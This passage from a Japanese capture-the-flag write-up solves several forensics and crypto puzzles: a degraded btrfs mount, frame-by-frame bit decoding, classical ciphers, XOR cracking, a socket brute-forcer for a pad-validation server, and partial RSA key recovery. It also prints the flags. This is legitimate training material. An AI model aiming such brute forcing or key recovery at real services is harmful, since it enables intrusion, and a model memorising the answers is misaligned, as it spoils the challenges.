修復した画像にフラグが書いてあった。
shctf{CH0Z0_rU1N5}
Interstellar Mystery (forensics)
$ qemu-img convert -f qcow2 -O raw master0-3.qcow2 master0-3.raw $ qemu-img convert -f qcow2 -O raw master0-4.qcow2 master0-4.raw $ file master0-3.raw master0-3.raw: BTRFS Filesystem label "data", sectorsize 4096, nodesize 16384, leafsize 16384, UUID=b75e5885-fe97-4e84-aa7f-9373ee09d6bf, 103305216/429498368 bytes used, 2 devices $ file master0-4.raw master0-4.raw: BTRFS Filesystem label "data", sectorsize 4096, nodesize 16384, leafsize 16384, UUID=b75e5885-fe97-4e84-aa7f-9373ee09d6bf, 103305216/429498368 bytes used, 2 devices $ sudo losetup -f master0-3.raw $ sudo losetup -f master0-4.raw $ sudo btrfs filesystem show Label: 'data' uuid: b75e5885-fe97-4e84-aa7f-9373ee09d6bf Total devices 2 FS bytes used 98.52MiB devid 1 size 204.80MiB used 136.00MiB path /dev/loop8 devid 2 size 204.80MiB used 136.00MiB path /dev/loop22 $ sudo mount -o degraded /dev/loop8 /mnt/tmp $ cd /mnt/tmp $ ls e $ strings e | grep shctf shctf{btrfs_is_awsome}e8h
shctf{btrfs_is_awsome}
Buzz's Secret Watch (Part 2) (forensics)
aviファイルの各フレームを静止画として切り出す。
#!/usr/bin/env python3 import cv2 video_path = 'buzz-bin.avi' cap = cv2.VideoCapture(video_path) num = 0 while(cap.isOpened()): ret, frame = cap.read() if ret == True: cv2.imwrite('div/picture{:0=5}'.format(num) + '.jpg', frame) num += 1 else: break cap.release()
赤の全点灯の後に緑で8bitの点灯をすることを繰り返している。ASCIIコードの2進数表記として、デコードしたいが、今回は32464個のフレームがあるので、スクリプトでデコードし抽出する。
#!/usr/bin/env python3 from PIL import Image def get_byte(fname): img = Image.open(fname).convert('RGB') y = 695 code = '' for i in range(8): x = 355 + 35 * i _, g, _ = img.getpixel((x, y)) if g <= 1: code += '0' else: code += '1' img.close() return bytes([int(code, 2)]) msg = b'' for i in range(1, 32465, 2): fname = 'div/picture%05d.jpg' % i msg += get_byte(fname) with open('flag.bin', 'wb') as f: f.write(msg)
$ file flag.bin flag.bin: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cb02752fbe4468db2532c39772bc4e3864a3eaa3, for GNU/Linux 3.2.0, not stripped $ ./flag.bin shctf{Th1s-Isnt-Fly1ng-THis-Is-FAlliNg-W1th-Styl3}
shctf{Th1s-Isnt-Fly1ng-THis-Is-FAlliNg-W1th-Styl3}
Khaaaaaan! (crypto)
いくつか暗号が混ざっている。
1行目の最初の方は「Alien Language」 https://www.dcode.fr/alien-language →shctfwithoutfreedom 1行目の後の方は「Halo Covenant Language」 https://www.dcode.fr/covenant-halo-language →ofchoice 2行目の最初の方は「The Klingon language」 https://methodshop.com/klingon-language-phrases/ →thereis 2行目の後の方は1行目とは別の「Alien Language」 https://theinfosphere.org/Alien_languages →nocreativity
shctf{without_freedom_of_choice_there_is_no_creativity}
Off The Grid (crypto)
Playfair暗号の要領で復号する。
UI -> th KO -> eP TH -> Ro NV -> ph GE -> ec LB -> Yh KC -> As RN -> sp PD -> oK DN -> en
thePRophecYhAsspoKen
shctf{THE_PROPHECY_HAS_SPOKEN}
Buzz Ransomware (crypto)
https://wiremask.eu/tools/xor-cracker/でXORのクラックをする。
鍵evilzurgで復号できた。復号したファイルをbuzzにリネームする。
$ file buzz buzz: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), too many program (3328) $ strings buzz | grep shctf shctf{Th1s-Isnt-Fly1ng-THis-Is-FAlliNg-W1th-Styl3}
shctf{Th1s-Isnt-Fly1ng-THis-Is-FAlliNg-W1th-Styl3}
Mobile Infantry (crypto)
$ nc 0.cloud.chals.io 27602 ####### ####&&&&&&&@&&&&&&&#### ###&&&&&&@@@&&&&@@@@@@@@@@@@@@@&&&## #&&@@@&&@@@@@@@@@@@@@@@@@@@@$$$$$$$$$$$$@@&## #&@@@@@$$$$@$$$$$@@@@@@@&&&&&&&@@@@$$$$$$$$$$$$$$@@&# #&@@@$$$@$$$$$$$@@&## BBBBBBBBBBBB #&&@@$$$$$$$$%$$@&# #&@@@@@$$$$@$@@&# BBBBBBBBBBBBBBBBBBBBBBBBBBBBB ##&@@$$$$$$$$$@# #@@@@@$$$$$$@&# BBBBBBBBBB BBBBBB #&@@$$$$$$$@& #@@@@$$$$$$@&# BBBBBBB BBB &@@$$$$%$$@# #@$$$$$$$$$@# BBBBBB BBB &@$$$%%%$@# #@$$$$$$$$@& BBBBBB BB #@$%%%%%%@# #@$$$%%%%%$& BBBBB #@&&&&&&&&&&&&&# BB#@%%%%%%$@# &$%$%%%%%$& BBBBB &$@$$$$%$$%%$$$& B #@%%%%%$$& @%%%%%%%%@ BBBB @@&&&&$%%%%%%%%%%%%%%@ BB &$%%$$$$@#B #$%$%%%%%$&BBBBB @%@$$$$$%%%%%%%$%%%%%%$#BB #@$$$$$$$# #$$$%%%%%@#BBBB %$$%%%%%%%%%%%%%%%%%%%$&BB &$%%$$$$@ #$$$$%%%$& BBB @%$%%%%%%%%%%%%%%%%%%%%%&BB #$%%%%%%@ B #$$$$$$%$&BBBB $@$$%%%%%%%%%%%%%%%%%%%%@ B #@%%%%%%@ B #$%%%%%%$#BBBB #$%%%%%%%%%%%%%%$@ B #@$$%%%%@ B #$%%%%%%$#BBB BBBB&%%%*%%%%%%%%%%$$$#BB #@$$%%%%@ B $%%%**%%#BBB #&## @$%%*%%%%%%%%%%%$$#BB ####&# #@$%$%%%& &%%****%@BBBB %$@$@@@&&&&#### @$%%%%%%%%%%%%%%$$&BBB #####&&&&@@@@$$$$$# &$$%%%*%#B #%%%%%*%$ BBB @*$%%%%%%%%%%%$$@@@&&&### @%%**%%%%%%%%%%%$$@ ##&&&@@@@@$$$$%%%%%%%%%%%%$#B #@$%****$ B @%%*%%%%&BBB #%$%%%****************%%$$$$@@%%%***%*%%%%%%%%%%$$$$$$$$%$%%%%%%********%%%%%@ B &$%****%&BB #%%***%%$ BB $%$%%*****************************************%%%%%%%%%%%%%%***%*************%&B @%%****$ B @%%***%%&BBB &$$%******************%%%%%%********************%**********%******************%$ B &$%***%%#BB $%*****$ BB #@%*******%%**%%%%**%%%%%%%*********%********%%******%**********%**%%%%%%$&# BB #$$*****@ B #%%****%@BBB BB #$***********%%**%%%*%*********************%**************%**%%*%%%$# BBBBB @$*****$ B &%%****%#BB $%%*****%*%**%***%%**************************************%*******%@BBBBB &$%****%#BB @%*****%#BB $%%%**%@ ##&@%%%%%*************************%***********$@###%*****@BBB &$%*****&BB $%*****$ BB %$%%%*$ BBBB&%%%%%**%*********************************@BBBBB@%****@BB #%%*****@BB %%*!*!*$ BB %$%%%%&BBB @$%%***@ #&@$***************%$&&&#&%*****@BBB #$****@BB #%%*****@ B %%*!!!*$ BB %%%%%$ BB @$%***$#BBBBB&%**************$ BBBB $%****&BB @%***@BB #%%*****@ B $%*!!!!$ BB %%%%%&BB $$%**%&BBB &$%*************&BBBB #$%***&BB #$**%@BB #%%*****@BB &%*!!!!%#BB # ##& BB $%%**$ BB #$%************%#BB &$%*%&BB &## BB &%%*****&BB #$*!!!!*&BB BBBBB &@$%$#BB #$%************$ BB @$$@#BB BBBBB @%%*!!*%#BB #$*!!!!*@ B B BBB @%*!**********$ BB # BBB %%%****$ BB @%!!!!*%#B BBB @%*!**********&BB BB &*%***!*@ BB &%*!!!!*@BB &%*!**********&BB $*%**!!%&BB $*!!!!*%#B #$**!!**!!!!*%#BB #*%*****$ BB &%*!!!!*@ B $*!****!!!**$ BB %*%****%&BBB $**!**!%#B @%!!********@BBB @*%*****% BB #%****!*$ B &%*!*******%&BB &%%*****%&BBB &%***!!*@ B &$*********%#BB #%%*!****@BBB &%*!!!!*& B #$%********$ BB #$%**!!!*@ BB &%!!!!!*& $%********@ BB #%%**!!!*@ BBB &%!!!!!*@ $%%*******@BB &%%%*!!!*@ BBB &%*!!!!*$# #&$%*********%& B @*%%***!*@ BBB &%*!!!!*%& #$%*%********!!!%@ #$*$%%****@ BBB #$******%@# #$%***********!!*%#B @%%%%%%**%@ BBB #@%******$& &@%*********!!*$& B &%%$%%%%**$#BBBB &$*******$# &$*******%& BBBB &%*%%%****%@ BBB @%*******$# B@**!!!**@BBBB &$*%*******$#BBBB #@%*****!*$&# &@@$$$@@#BBB #@$%%*******%& BBB #@%***!!!*%@&# BBBBBBBBB #&$%%%******%%& BBBB @%*!***!**$@&## #&@$%%%*******%$# BBBB B &$*!*!*****%$@&## #&@$$%%%%*******%@#BBBBB B #@%**!***!***%$@@&&#### ###&@@$$%%%%%%%****!*%$& BBBBB BB #@%***!********%$$$$@@@@@@@@@@@@@@$$$$%%%%%%%%********%$& BBBBB BB #&@%***************%%%%%%%%%%%%%%%*************%$@# BBBBBB BBB #&@$%*********************************%%$&# BBBBBBB BBB ##&@$$%%****************%%%%$$@&# BBBBBBB BBBBBB ###&&&&&@@@&&&### BBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBB Welcome to Ricos Roughnecks. We use 1-time-pads to keep all our secrets safe from the Arachnids. Here in the mobile infantry, we also implement some stronger roughneck checks. Enter pad > 1 [!]- Failed pad strength validation. Please use a stronger pad to keep the mobile infantry safe. ------------------------------------------ def len_check(pad): if len(pad) != 38: return False return True ------------------------------------------
全体で38バイトである必要がある。
$ nc 0.cloud.chals.io 27602 : Enter pad > aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [!]- Failed pad strength validation. Please use a stronger pad to keep the mobile infantry safe. ------------------------------------------ def check1(pad): for i in range(0, int(len(pad)/2)+1): if not pad[i].isupper(): return False return True ------------------------------------------ $ nc 0.cloud.chals.io 27602 : Enter pad > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [!]- Failed pad strength validation. Please use a stronger pad to keep the mobile infantry safe. ------------------------------------------ def check2(pad): for i in range(int(len(pad)/2)+1, len(pad)): if not pad[i].islower(): return False return True ------------------------------------------
前半20バイトが大文字、後半18バイトが小文字である必要がある。
$ nc 0.cloud.chals.io 27602 : Enter pad > AAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaa [!]- Failed pad strength validation. Please use a stronger pad to keep the mobile infantry safe. ------------------------------------------ def check3(pad): for i in range(0, int(len(pad)/2)): if ord(pad[i]) != ord(pad[i+1])-1: return False return True ------------------------------------------
前半20バイトはASCIIコードで1ずつ増加していく必要がある。
$ nc 0.cloud.chals.io 27602 : Enter pad > ABCDEFGHIJKLMNOPQRSTaaaaaaaaaaaaaaaaaa [!]- Failed pad strength validation. Please use a stronger pad to keep the mobile infantry safe. ------------------------------------------ def check4(pad): for i in range(int(len(pad)/2)+1, len(pad)-1): if ord(pad[i]) != ord(pad[i+1])+1: return False return True ------------------------------------------
後半18バイトはASCIIコードで1ずつ減少していく必要がある。
$ nc 0.cloud.chals.io 27602 ####### ####&&&&&&&@&&&&&&&#### ###&&&&&&@@@&&&&@@@@@@@@@@@@@@@&&&## #&&@@@&&@@@@@@@@@@@@@@@@@@@@$$$$$$$$$$$$@@&## #&@@@@@$$$$@$$$$$@@@@@@@&&&&&&&@@@@$$$$$$$$$$$$$$@@&# #&@@@$$$@$$$$$$$@@&## BBBBBBBBBBBB #&&@@$$$$$$$$%$$@&# #&@@@@@$$$$@$@@&# BBBBBBBBBBBBBBBBBBBBBBBBBBBBB ##&@@$$$$$$$$$@# #@@@@@$$$$$$@&# BBBBBBBBBB BBBBBB #&@@$$$$$$$@& #@@@@$$$$$$@&# BBBBBBB BBB &@@$$$$%$$@# #@$$$$$$$$$@# BBBBBB BBB &@$$$%%%$@# #@$$$$$$$$@& BBBBBB BB #@$%%%%%%@# #@$$$%%%%%$& BBBBB #@&&&&&&&&&&&&&# BB#@%%%%%%$@# &$%$%%%%%$& BBBBB &$@$$$$%$$%%$$$& B #@%%%%%$$& @%%%%%%%%@ BBBB @@&&&&$%%%%%%%%%%%%%%@ BB &$%%$$$$@#B #$%$%%%%%$&BBBBB @%@$$$$$%%%%%%%$%%%%%%$#BB #@$$$$$$$# #$$$%%%%%@#BBBB %$$%%%%%%%%%%%%%%%%%%%$&BB &$%%$$$$@ #$$$$%%%$& BBB @%$%%%%%%%%%%%%%%%%%%%%%&BB #$%%%%%%@ B #$$$$$$%$&BBBB $@$$%%%%%%%%%%%%%%%%%%%%@ B #@%%%%%%@ B #$%%%%%%$#BBBB #$%%%%%%%%%%%%%%$@ B #@$$%%%%@ B #$%%%%%%$#BBB BBBB&%%%*%%%%%%%%%%$$$#BB #@$$%%%%@ B $%%%**%%#BBB #&## @$%%*%%%%%%%%%%%$$#BB ####&# #@$%$%%%& &%%****%@BBBB %$@$@@@&&&&#### @$%%%%%%%%%%%%%%$$&BBB #####&&&&@@@@$$$$$# &$$%%%*%#B #%%%%%*%$ BBB @*$%%%%%%%%%%%$$@@@&&&### @%%**%%%%%%%%%%%$$@ ##&&&@@@@@$$$$%%%%%%%%%%%%$#B #@$%****$ B @%%*%%%%&BBB #%$%%%****************%%$$$$@@%%%***%*%%%%%%%%%%$$$$$$$$%$%%%%%%********%%%%%@ B &$%****%&BB #%%***%%$ BB $%$%%*****************************************%%%%%%%%%%%%%%***%*************%&B @%%****$ B @%%***%%&BBB &$$%******************%%%%%%********************%**********%******************%$ B &$%***%%#BB $%*****$ BB #@%*******%%**%%%%**%%%%%%%*********%********%%******%**********%**%%%%%%$&# BB #$$*****@ B #%%****%@BBB BB #$***********%%**%%%*%*********************%**************%**%%*%%%$# BBBBB @$*****$ B &%%****%#BB $%%*****%*%**%***%%**************************************%*******%@BBBBB &$%****%#BB @%*****%#BB $%%%**%@ ##&@%%%%%*************************%***********$@###%*****@BBB &$%*****&BB $%*****$ BB %$%%%*$ BBBB&%%%%%**%*********************************@BBBBB@%****@BB #%%*****@BB %%*!*!*$ BB %$%%%%&BBB @$%%***@ #&@$***************%$&&&#&%*****@BBB #$****@BB #%%*****@ B %%*!!!*$ BB %%%%%$ BB @$%***$#BBBBB&%**************$ BBBB $%****&BB @%***@BB #%%*****@ B $%*!!!!$ BB %%%%%&BB $$%**%&BBB &$%*************&BBBB #$%***&BB #$**%@BB #%%*****@BB &%*!!!!%#BB # ##& BB $%%**$ BB #$%************%#BB &$%*%&BB &## BB &%%*****&BB #$*!!!!*&BB BBBBB &@$%$#BB #$%************$ BB @$$@#BB BBBBB @%%*!!*%#BB #$*!!!!*@ B B BBB @%*!**********$ BB # BBB %%%****$ BB @%!!!!*%#B BBB @%*!**********&BB BB &*%***!*@ BB &%*!!!!*@BB &%*!**********&BB $*%**!!%&BB $*!!!!*%#B #$**!!**!!!!*%#BB #*%*****$ BB &%*!!!!*@ B $*!****!!!**$ BB %*%****%&BBB $**!**!%#B @%!!********@BBB @*%*****% BB #%****!*$ B &%*!*******%&BB &%%*****%&BBB &%***!!*@ B &$*********%#BB #%%*!****@BBB &%*!!!!*& B #$%********$ BB #$%**!!!*@ BB &%!!!!!*& $%********@ BB #%%**!!!*@ BBB &%!!!!!*@ $%%*******@BB &%%%*!!!*@ BBB &%*!!!!*$# #&$%*********%& B @*%%***!*@ BBB &%*!!!!*%& #$%*%********!!!%@ #$*$%%****@ BBB #$******%@# #$%***********!!*%#B @%%%%%%**%@ BBB #@%******$& &@%*********!!*$& B &%%$%%%%**$#BBBB &$*******$# &$*******%& BBBB &%*%%%****%@ BBB @%*******$# B@**!!!**@BBBB &$*%*******$#BBBB #@%*****!*$&# &@@$$$@@#BBB #@$%%*******%& BBB #@%***!!!*%@&# BBBBBBBBB #&$%%%******%%& BBBB @%*!***!**$@&## #&@$%%%*******%$# BBBB B &$*!*!*****%$@&## #&@$$%%%%*******%@#BBBBB B #@%**!***!***%$@@&&#### ###&@@$$%%%%%%%****!*%$& BBBBB BB #@%***!********%$$$$@@@@@@@@@@@@@@$$$$%%%%%%%%********%$& BBBBB BB #&@%***************%%%%%%%%%%%%%%%*************%$@# BBBBBB BBB #&@$%*********************************%%$&# BBBBBBB BBB ##&@$$%%****************%%%%$$@&# BBBBBBB BBBBBB ###&&&&&@@@&&&### BBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBB Welcome to Ricos Roughnecks. We use 1-time-pads to keep all our secrets safe from the Arachnids. Here in the mobile infantry, we also implement some stronger roughneck checks. Enter pad > ABCDEFGHIJKLMNOPQRSTrqponmlkjihgfedcba [+] Welcome the mobile infantry, keep fighting.
条件を満たすが、目的のものではなかったようだ。以上の条件を満たすものをブルートフォースで探す。
#!/usr/bin/env python3 import socket import string def recvuntil(s, tail): data = b'' while True: if tail in data: return data.decode() data += s.recv(1) found = False for i in range(7): for j in range(9): pad = string.ascii_uppercase[i:i+20] pad += string.ascii_lowercase[j:j+18][::-1] s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('0.cloud.chals.io', 27602)) data = recvuntil(s, b'> ') print(data + pad) s.sendall(pad.encode() + b'\n') data = recvuntil(s, b'\n').rstrip() print(data) if data != '[+] Welcome the mobile infantry, keep fighting.': found = True break if found: break
実行結果は以下の通り。
: ####### ####&&&&&&&@&&&&&&&#### ###&&&&&&@@@&&&&@@@@@@@@@@@@@@@&&&## #&&@@@&&@@@@@@@@@@@@@@@@@@@@$$$$$$$$$$$$@@&## #&@@@@@$$$$@$$$$$@@@@@@@&&&&&&&@@@@$$$$$$$$$$$$$$@@&# #&@@@$$$@$$$$$$$@@&## BBBBBBBBBBBB #&&@@$$$$$$$$%$$@&# #&@@@@@$$$$@$@@&# BBBBBBBBBBBBBBBBBBBBBBBBBBBBB ##&@@$$$$$$$$$@# #@@@@@$$$$$$@&# BBBBBBBBBB BBBBBB #&@@$$$$$$$@& #@@@@$$$$$$@&# BBBBBBB BBB &@@$$$$%$$@# #@$$$$$$$$$@# BBBBBB BBB &@$$$%%%$@# #@$$$$$$$$@& BBBBBB BB #@$%%%%%%@# #@$$$%%%%%$& BBBBB #@&&&&&&&&&&&&&# BB#@%%%%%%$@# &$%$%%%%%$& BBBBB &$@$$$$%$$%%$$$& B #@%%%%%$$& @%%%%%%%%@ BBBB @@&&&&$%%%%%%%%%%%%%%@ BB &$%%$$$$@#B #$%$%%%%%$&BBBBB @%@$$$$$%%%%%%%$%%%%%%$#BB #@$$$$$$$# #$$$%%%%%@#BBBB %$$%%%%%%%%%%%%%%%%%%%$&BB &$%%$$$$@ #$$$$%%%$& BBB @%$%%%%%%%%%%%%%%%%%%%%%&BB #$%%%%%%@ B #$$$$$$%$&BBBB $@$$%%%%%%%%%%%%%%%%%%%%@ B #@%%%%%%@ B #$%%%%%%$#BBBB #$%%%%%%%%%%%%%%$@ B #@$$%%%%@ B #$%%%%%%$#BBB BBBB&%%%*%%%%%%%%%%$$$#BB #@$$%%%%@ B $%%%**%%#BBB #&## @$%%*%%%%%%%%%%%$$#BB ####&# #@$%$%%%& &%%****%@BBBB %$@$@@@&&&&#### @$%%%%%%%%%%%%%%$$&BBB #####&&&&@@@@$$$$$# &$$%%%*%#B #%%%%%*%$ BBB @*$%%%%%%%%%%%$$@@@&&&### @%%**%%%%%%%%%%%$$@ ##&&&@@@@@$$$$%%%%%%%%%%%%$#B #@$%****$ B @%%*%%%%&BBB #%$%%%****************%%$$$$@@%%%***%*%%%%%%%%%%$$$$$$$$%$%%%%%%********%%%%%@ B &$%****%&BB #%%***%%$ BB $%$%%*****************************************%%%%%%%%%%%%%%***%*************%&B @%%****$ B @%%***%%&BBB &$$%******************%%%%%%********************%**********%******************%$ B &$%***%%#BB $%*****$ BB #@%*******%%**%%%%**%%%%%%%*********%********%%******%**********%**%%%%%%$&# BB #$$*****@ B #%%****%@BBB BB #$***********%%**%%%*%*********************%**************%**%%*%%%$# BBBBB @$*****$ B &%%****%#BB $%%*****%*%**%***%%**************************************%*******%@BBBBB &$%****%#BB @%*****%#BB $%%%**%@ ##&@%%%%%*************************%***********$@###%*****@BBB &$%*****&BB $%*****$ BB %$%%%*$ BBBB&%%%%%**%*********************************@BBBBB@%****@BB #%%*****@BB %%*!*!*$ BB %$%%%%&BBB @$%%***@ #&@$***************%$&&&#&%*****@BBB #$****@BB #%%*****@ B %%*!!!*$ BB %%%%%$ BB @$%***$#BBBBB&%**************$ BBBB $%****&BB @%***@BB #%%*****@ B $%*!!!!$ BB %%%%%&BB $$%**%&BBB &$%*************&BBBB #$%***&BB #$**%@BB #%%*****@BB &%*!!!!%#BB # ##& BB $%%**$ BB #$%************%#BB &$%*%&BB &## BB &%%*****&BB #$*!!!!*&BB BBBBB &@$%$#BB #$%************$ BB @$$@#BB BBBBB @%%*!!*%#BB #$*!!!!*@ B B BBB @%*!**********$ BB # BBB %%%****$ BB @%!!!!*%#B BBB @%*!**********&BB BB &*%***!*@ BB &%*!!!!*@BB &%*!**********&BB $*%**!!%&BB $*!!!!*%#B #$**!!**!!!!*%#BB #*%*****$ BB &%*!!!!*@ B $*!****!!!**$ BB %*%****%&BBB $**!**!%#B @%!!********@BBB @*%*****% BB #%****!*$ B &%*!*******%&BB &%%*****%&BBB &%***!!*@ B &$*********%#BB #%%*!****@BBB &%*!!!!*& B #$%********$ BB #$%**!!!*@ BB &%!!!!!*& $%********@ BB #%%**!!!*@ BBB &%!!!!!*@ $%%*******@BB &%%%*!!!*@ BBB &%*!!!!*$# #&$%*********%& B @*%%***!*@ BBB &%*!!!!*%& #$%*%********!!!%@ #$*$%%****@ BBB #$******%@# #$%***********!!*%#B @%%%%%%**%@ BBB #@%******$& &@%*********!!*$& B &%%$%%%%**$#BBBB &$*******$# &$*******%& BBBB &%*%%%****%@ BBB @%*******$# B@**!!!**@BBBB &$*%*******$#BBBB #@%*****!*$&# &@@$$$@@#BBB #@$%%*******%& BBB #@%***!!!*%@&# BBBBBBBBB #&$%%%******%%& BBBB @%*!***!**$@&## #&@$%%%*******%$# BBBB B &$*!*!*****%$@&## #&@$$%%%%*******%@#BBBBB B #@%**!***!***%$@@&&#### ###&@@$$%%%%%%%****!*%$& BBBBB BB #@%***!********%$$$$@@@@@@@@@@@@@@$$$$%%%%%%%%********%$& BBBBB BB #&@%***************%%%%%%%%%%%%%%%*************%$@# BBBBBB BBB #&@$%*********************************%%$&# BBBBBBB BBB ##&@$$%%****************%%%%$$@&# BBBBBBB BBBBBB ###&&&&&@@@&&&### BBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBB Welcome to Ricos Roughnecks. We use 1-time-pads to keep all our secrets safe from the Arachnids. Here in the mobile infantry, we also implement some stronger roughneck checks. Enter pad > EFGHIJKLMNOPQRSTUVWXwvutsrqponmlkjihgf [+] Welcome the mobile infantry, keep fighting. ####### ####&&&&&&&@&&&&&&&#### ###&&&&&&@@@&&&&@@@@@@@@@@@@@@@&&&## #&&@@@&&@@@@@@@@@@@@@@@@@@@@$$$$$$$$$$$$@@&## #&@@@@@$$$$@$$$$$@@@@@@@&&&&&&&@@@@$$$$$$$$$$$$$$@@&# #&@@@$$$@$$$$$$$@@&## BBBBBBBBBBBB #&&@@$$$$$$$$%$$@&# #&@@@@@$$$$@$@@&# BBBBBBBBBBBBBBBBBBBBBBBBBBBBB ##&@@$$$$$$$$$@# #@@@@@$$$$$$@&# BBBBBBBBBB BBBBBB #&@@$$$$$$$@& #@@@@$$$$$$@&# BBBBBBB BBB &@@$$$$%$$@# #@$$$$$$$$$@# BBBBBB BBB &@$$$%%%$@# #@$$$$$$$$@& BBBBBB BB #@$%%%%%%@# #@$$$%%%%%$& BBBBB #@&&&&&&&&&&&&&# BB#@%%%%%%$@# &$%$%%%%%$& BBBBB &$@$$$$%$$%%$$$& B #@%%%%%$$& @%%%%%%%%@ BBBB @@&&&&$%%%%%%%%%%%%%%@ BB &$%%$$$$@#B #$%$%%%%%$&BBBBB @%@$$$$$%%%%%%%$%%%%%%$#BB #@$$$$$$$# #$$$%%%%%@#BBBB %$$%%%%%%%%%%%%%%%%%%%$&BB &$%%$$$$@ #$$$$%%%$& BBB @%$%%%%%%%%%%%%%%%%%%%%%&BB #$%%%%%%@ B #$$$$$$%$&BBBB $@$$%%%%%%%%%%%%%%%%%%%%@ B #@%%%%%%@ B #$%%%%%%$#BBBB #$%%%%%%%%%%%%%%$@ B #@$$%%%%@ B #$%%%%%%$#BBB BBBB&%%%*%%%%%%%%%%$$$#BB #@$$%%%%@ B $%%%**%%#BBB #&## @$%%*%%%%%%%%%%%$$#BB ####&# #@$%$%%%& &%%****%@BBBB %$@$@@@&&&&#### @$%%%%%%%%%%%%%%$$&BBB #####&&&&@@@@$$$$$# &$$%%%*%#B #%%%%%*%$ BBB @*$%%%%%%%%%%%$$@@@&&&### @%%**%%%%%%%%%%%$$@ ##&&&@@@@@$$$$%%%%%%%%%%%%$#B #@$%****$ B @%%*%%%%&BBB #%$%%%****************%%$$$$@@%%%***%*%%%%%%%%%%$$$$$$$$%$%%%%%%********%%%%%@ B &$%****%&BB #%%***%%$ BB $%$%%*****************************************%%%%%%%%%%%%%%***%*************%&B @%%****$ B @%%***%%&BBB &$$%******************%%%%%%********************%**********%******************%$ B &$%***%%#BB $%*****$ BB #@%*******%%**%%%%**%%%%%%%*********%********%%******%**********%**%%%%%%$&# BB #$$*****@ B #%%****%@BBB BB #$***********%%**%%%*%*********************%**************%**%%*%%%$# BBBBB @$*****$ B &%%****%#BB $%%*****%*%**%***%%**************************************%*******%@BBBBB &$%****%#BB @%*****%#BB $%%%**%@ ##&@%%%%%*************************%***********$@###%*****@BBB &$%*****&BB $%*****$ BB %$%%%*$ BBBB&%%%%%**%*********************************@BBBBB@%****@BB #%%*****@BB %%*!*!*$ BB %$%%%%&BBB @$%%***@ #&@$***************%$&&&#&%*****@BBB #$****@BB #%%*****@ B %%*!!!*$ BB %%%%%$ BB @$%***$#BBBBB&%**************$ BBBB $%****&BB @%***@BB #%%*****@ B $%*!!!!$ BB %%%%%&BB $$%**%&BBB &$%*************&BBBB #$%***&BB #$**%@BB #%%*****@BB &%*!!!!%#BB # ##& BB $%%**$ BB #$%************%#BB &$%*%&BB &## BB &%%*****&BB #$*!!!!*&BB BBBBB &@$%$#BB #$%************$ BB @$$@#BB BBBBB @%%*!!*%#BB #$*!!!!*@ B B BBB @%*!**********$ BB # BBB %%%****$ BB @%!!!!*%#B BBB @%*!**********&BB BB &*%***!*@ BB &%*!!!!*@BB &%*!**********&BB $*%**!!%&BB $*!!!!*%#B #$**!!**!!!!*%#BB #*%*****$ BB &%*!!!!*@ B $*!****!!!**$ BB %*%****%&BBB $**!**!%#B @%!!********@BBB @*%*****% BB #%****!*$ B &%*!*******%&BB &%%*****%&BBB &%***!!*@ B &$*********%#BB #%%*!****@BBB &%*!!!!*& B #$%********$ BB #$%**!!!*@ BB &%!!!!!*& $%********@ BB #%%**!!!*@ BBB &%!!!!!*@ $%%*******@BB &%%%*!!!*@ BBB &%*!!!!*$# #&$%*********%& B @*%%***!*@ BBB &%*!!!!*%& #$%*%********!!!%@ #$*$%%****@ BBB #$******%@# #$%***********!!*%#B @%%%%%%**%@ BBB #@%******$& &@%*********!!*$& B &%%$%%%%**$#BBBB &$*******$# &$*******%& BBBB &%*%%%****%@ BBB @%*******$# B@**!!!**@BBBB &$*%*******$#BBBB #@%*****!*$&# &@@$$$@@#BBB #@$%%*******%& BBB #@%***!!!*%@&# BBBBBBBBB #&$%%%******%%& BBBB @%*!***!**$@&## #&@$%%%*******%$# BBBB B &$*!*!*****%$@&## #&@$$%%%%*******%@#BBBBB B #@%**!***!***%$@@&&#### ###&@@$$%%%%%%%****!*%$& BBBBB BB #@%***!********%$$$$@@@@@@@@@@@@@@$$$$%%%%%%%%********%$& BBBBB BB #&@%***************%%%%%%%%%%%%%%%*************%$@# BBBBBB BBB #&@$%*********************************%%$&# BBBBBBB BBB ##&@$$%%****************%%%%$$@&# BBBBBBB BBBBBB ###&&&&&@@@&&&### BBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBB Welcome to Ricos Roughnecks. We use 1-time-pads to keep all our secrets safe from the Arachnids. Here in the mobile infantry, we also implement some stronger roughneck checks. Enter pad > EFGHIJKLMNOPQRSTUVWXxwvutsrqponmlkjihg [+] The fight is over, here is your flag: shctf{Th3-On1Y-G00d-BUg-I$-A-deAd-BuG}
shctf{Th3-On1Y-G00d-BUg-I$-A-deAd-BuG}
Information Paradox (crypto)
秘密鍵は部分的に2か所がマスクされている。与えられた情報から秘密鍵を復元することができれば、フラグが得られそう。
秘密鍵はバイナリ構成で見てみると、以下のような構造になっている。
RSAPrivateKey ::= SEQUENCE { version Version, modulus INTEGER, -- n publicExponent INTEGER, -- e privateExponent INTEGER, -- d prime1 INTEGER, -- p prime2 INTEGER, -- q exponent1 INTEGER, -- d mod (p-1) exponent2 INTEGER, -- d mod (q-1) coefficient INTEGER, -- (inverse of q) mod p otherPrimeInfos OtherPrimeInfos OPTIONAL }
base64デコードしたデータをバイナリエディタで確認してみると、q, dpがわかる。さらにeは通常の65537と推測して、pを割り出す。あとはdを算出後、n, e, dから秘密鍵を生成する。
